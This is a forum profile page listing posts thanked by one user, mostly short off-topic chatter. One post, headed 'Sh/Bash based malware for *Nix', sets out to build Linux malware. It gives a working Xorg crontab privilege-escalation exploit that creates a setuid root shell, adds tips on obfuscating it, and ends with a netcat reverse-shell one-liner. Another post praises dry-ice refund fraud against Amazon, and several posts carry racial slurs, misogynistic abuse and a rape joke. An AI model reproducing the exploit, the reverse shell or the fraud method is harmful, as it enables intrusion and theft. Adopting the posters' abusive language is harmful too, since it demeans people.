Posts That Were Thanked by Cowboy2013
-
2021-07-28 at 10:44 AM UTC in The only shitty thing about coke straight from the brick.
-
2021-07-24 at 7:24 AM UTC in Sh/Bash based malware for *Nix.
Welcome to another edition of Sophie's Cyber Shenanigans. This thread, i got some unconventional ways to work on *Nix based malware. And a couple questions for the level 97 shell script wizards.
So i am experimenting with shell scripts, to find out what is and isn't viable should i want to create a shell script based malware for loonix. Why shell script? They're easily obfuscated, a bunch of utils have PE/Static binary formats you can bring along, or deploy remotely, and all distros have `Sh` and almost always `Bash` as far as i am aware.
What's more, shell scripts, allow one to invoke commands and operations from any scripting lang that have their interpreter installed on the distro you are targeting 'out of the box' as it. Which tend to be quite a few.
Chances are you'll have access to: Perl, Python, Lua, TclSh, M4(Plus other Macro 'langs') and if you're lucky PHP, Ruby, Node and so on and so forth.
Another benefit of using `Sh` or `Bash` is that you don't have to worry about compatibility issues. Should you want to make use of payloads written in let's say C, you have the opportunity to perform Recon simply with the `uname -svm` command and then you'll have the proper architecture and kernel version. Which is great to know if you want to write an exploit for the system you're on.
Here's an example.
```bash
#!/bin/bash
# There are a bunch of vulns in the Xorg server and related utils like
#
# X.Org xorg-x11-xfs - Local Race Condition
# xorg-x11-server - 'inittab Local Privilege Escalation
#
# And much more, we're gonna do the second one as an example
#
# When ##!!## occurs in the script i got some annotations below
#
cat << EOF > /tmp/x_orgasm
cp /bin/sh /usr/local/bin/pwned ##!!##_1
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
chmod 4777 /usr/local/bin/pwned
EOF
chmod +x /tmp/x_orgasm
# prepare your anus
cd /etc
Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
sleep 5
pkill Xorg ##!!##_4
sleep 120
ls -l /etc/crontab*
ls -l /usr/local/bin/pwned
# Start elevated Sh
/usr/local/bin/pwned
```
##!!##_1
Before you say: you can't just copy /bin/sh. Well, we don't really need to; the line after that builds a Sh shell too.
If you're afraid we won't have permissions for `gcc` here's something that'll do exactly the same with UID 0.
Alternatively we could ship a shell in Asm with the payload up top.
##!!##_2
/tmp and some of the other directories featured here get mounted as NOSUID which is good. Because NOSUID beats root.
/usr/local/bin is part of the $PATH and has MODE 2775/drwxrwsr-x
##!!##_3
The operation here is what triggers the bug. Without getting too much into the weeds, killing Xorg at ##!!##_4 with pkill will cause inittab to restart the cronjob related to Xorg that we changed with the operation we ran previously, which then starts our 'pwned' Sh with root privileges.
Obfuscation
There's tools to obfuscate bash. Which is great. Here's an example of this same script obfuscated with the methods below.
String/Hex Hash, 1 Iteration
Token/ForCode, 1 Iteration
Find the result here
Or if you prefer a picture check the spoiler out below.
Anyway, i hope you found that informative. However before you go i do actually have a question for the level 97 shell script wizards.
I want to have a function in a shell script that i can call with different commands, so `cmd_func cat /etc/passwd`. My current implementation looks like this:
```sh
#!/usr/bin/env -S sh\_"umask\_700"\_-f
# BTW This is legal right ^
#
# I'm U_masking because i am writing stuff out
# Under a specific user account
buff_ops()
{ # I want to run it through a FIFO pipe/buffer in fact it is a requirement.
cmd=$0
arg=$1
mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
};
buff_ops CMD ARG # <- is what i want
```
I figured it should be good since stuff like this works also:
```sh
rm -f x; mknod x p && nc 192.168.1.10 1337 0<x | /bin/bash 1>x
```
Thicc threads niggas. One on low level security and dev incoming soon as well. -
2021-07-20 at 1:55 PM UTC in Ways around not getting a fire stick or smart tv
Kodi is still a thing
-
2021-07-20 at 1:01 PM UTC in NIS fitness club
I had a 4 day old boiled egg for breakfast.
-
2021-07-20 at 11:46 AM UTC in Dry icing postal fraud (eg Amazon)This is genius - when returning electronics to amazon you put dry ice into a box and send it, making sure to insure it and get proof of postage, including weight. The dry ice evaporates while the box is in transit, so amazon receive an empty box, and assume the item was stolen in transit.
https://sinister.ly/Thread-Amazon-advance-refund--131758 -
2021-07-20 at 9:39 AM UTC in Why breaking bad and the wire are the best shows
by legal I mean non regulated
-
2021-07-20 at 4:49 AM UTC in Yanks shilling for revolution in Cuba makes no sense
-
2021-07-19 at 11:23 PM UTC in I hate being old
-
2021-07-19 at 4:03 PM UTC in Yanks shilling for revolution in Cuba makes no sense
-
2021-07-19 at 2:52 PM UTC in Yanks shilling for revolution in Cuba makes no sense
Cuba is in every way better off than America.
Cubans don't have massive depression, they don't have fentanyl overdoses, they don't have endless wars, they don't have massive homelessness, they don't have healthcare bankruptcies, they don't have BLM.
Americans ought to be shilling for revolution in America instead.
-
2021-07-18 at 6:41 PM UTC in Official: CandyRein discussion thread
-
2021-07-18 at 6:33 PM UTC in Marilyn Manson Discussion
Manson rules
We’re all stars now in the dope show
Seen him live with Alice cooper was good
-
2021-07-18 at 3:33 PM UTC in What are you doing at the momentSHE GONNA SEND U A DIK PIC NOW
-
2021-07-18 at 11:50 AM UTC in Official: CandyRein discussion thread
Originally posted by BeeReBuddy When Candyrein first came it was the moment she found out I was a white guy.
I made the mistake of advertising the fona-fone and she blew it up.
Back then I was on a pay as you go plan and I paid dearly.
That bitch is not funny. She is not interesting. She is not special.
The only thing she is, is easy.
What a slut.
whoa -
2021-07-17 at 7:46 PM UTC in After seeing what amphetamines and cocaine did to my friends in the last year...*rapes cnadyrein*
-
2021-07-14 at 10:50 PM UTC in Cyber security thread: What is the situation between American and Chinese hackers
Originally posted by Cowboy2013 U.S. dissident groups or anti-Chinese? Or both?
Anti-CCP. It goes so far as keeping track of Chinese people who may be sympathetic to the CCP, just to keep them in line. US Dissidents are just convenient for China in terms of destabilization efforts on the US home front. -
2021-07-14 at 10:03 PM UTC in Cyber security thread: What is the situation between American and Chinese hackers
It's a complex situation and i'm not part of the intel community so i don't have very much to go on. By virtue of my OSS work i have the opportunity to speak with some people who are intel adjacent but NDA's are a thing so what i do hear on occasion is far from the complete picture. To the best of my knowledge there's a bit of an asymmetry between the CCP and US Intel. The CCP is very much focused on espionage of all sorts, corporate, governmental and surveillance of Chinese nationals and dissident groups based out of the US. The CCP does a lot of HUMINT as well, which is a bit like the spy stuff you see in the movies.
Another notable thing the CCP does is work with sentiment analysis, and sentiment manipulation. China is very keen on controlling how the world perceives them and takes active measures to try and influence people to see China in a positive light(Sentiment manipulation)
China is very good at information warfare. Traditional SIGINT as far as military intel goes is something the US is good in. But that is only one strategic area of interest when it comes to this concept of cyber war, while the CCP fights on multiple fronts as it were. Unfortunately i don't know enough to say whether or not the US Intel Community is equipped from a counter-intelligence perspective to defend against the CCP's style of conducting its cyber/intel operations.
-
2021-07-14 at 6:03 PM UTC in I sent a link to the site to a woman
-
2021-07-14 at 5:33 PM UTC in I sent a link to the site to a womanThe OG niggas will just chase her off anyway like they have 95% of the ones that came from DH.
-
2021-07-14 at 5:29 PM UTC in I sent a link to the site to a woman
Ooh what's her ASL and how old is she and location